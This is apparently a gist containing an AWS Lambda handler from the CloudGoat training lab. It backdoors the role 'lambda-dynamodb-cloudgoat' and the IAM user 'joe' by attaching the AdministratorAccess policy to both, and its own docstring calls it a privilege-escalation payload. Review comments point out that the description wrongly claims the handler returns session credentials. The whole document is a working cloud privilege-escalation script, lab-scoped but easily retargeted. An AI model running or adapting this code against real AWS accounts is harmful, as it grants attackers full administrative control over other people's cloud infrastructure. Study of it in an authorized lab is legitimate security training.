Lambda that backdoors CloudGoat's lambda-dynamodb-cloudgoat role (and the IAM user `joe`) by attaching the AWS-managed AdministratorAccess policy to them. The description claims that once this Lambda is invoked via an HTTP event it returns temporary AWS session credentials; note that the handler as listed below only performs the policy attachments and returns an empty dict, so credential retrieval is not part of this code.
import boto3 | |
import json | |
# Managed policy ARNs attached to every target below. AdministratorAccess
# is the AWS-managed full-admin policy, so a single attachment is enough.
POLICIES_TO_ATTACH = ['arn:aws:iam::aws:policy/AdministratorAccess']

# Targets of the escalation. The role is CloudGoat's lambda-dynamodb scenario
# role; the user name is presumably from the same lab setup -- adjust both
# before reuse elsewhere.
ROLE_TO_BACKDOOR = 'lambda-dynamodb-cloudgoat'
USER_TO_BACKDOOR = 'joe'
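def endpoint(event, context):
    """Lambda handler: attach POLICIES_TO_ATTACH to the target role and user.

    This is a privilege-escalation payload for the CloudGoat lab. It only
    works when the Lambda's execution role is itself allowed to call
    iam:AttachRolePolicy / iam:AttachUserPolicy; otherwise both attempts
    fail and are logged. The two targets are attempted independently so a
    failure on the role does not prevent the user attempt.

    NOTE(review): both calls are IAM control-plane writes and can be
    expected to appear in CloudTrail as AttachRolePolicy / AttachUserPolicy
    events -- this is a loud technique, not a stealthy one.

    Args:
        event: Lambda invocation event (unused).
        context: Lambda context object (unused).

    Returns:
        dict: always empty. Despite the gist description, this handler does
        not return any session credentials.
    """
    iam = boto3.client('iam')
    resp = {}

    try:
        for pol in POLICIES_TO_ATTACH:
            iam.attach_role_policy(
                RoleName=ROLE_TO_BACKDOOR,
                PolicyArn=pol,
            )
            print('[+] Attached policy ({}) to role ({})'.format(pol, ROLE_TO_BACKDOOR))
    except Exception as e:
        # Best-effort: log and fall through so the user attempt still runs.
        print('[!] Backdooring role failed: "{}"'.format(str(e)))

    try:
        for pol in POLICIES_TO_ATTACH:
            iam.attach_user_policy(
                UserName=USER_TO_BACKDOOR,
                PolicyArn=pol,
            )
            # Fixed: the original message reported the *role* name here, which
            # made the user attachment invisible in the logs.
            print('[+] Attached policy ({}) to user ({})'.format(pol, USER_TO_BACKDOOR))
    except Exception as e:
        print('[!] Backdooring user failed: "{}"'.format(str(e)))

    return resp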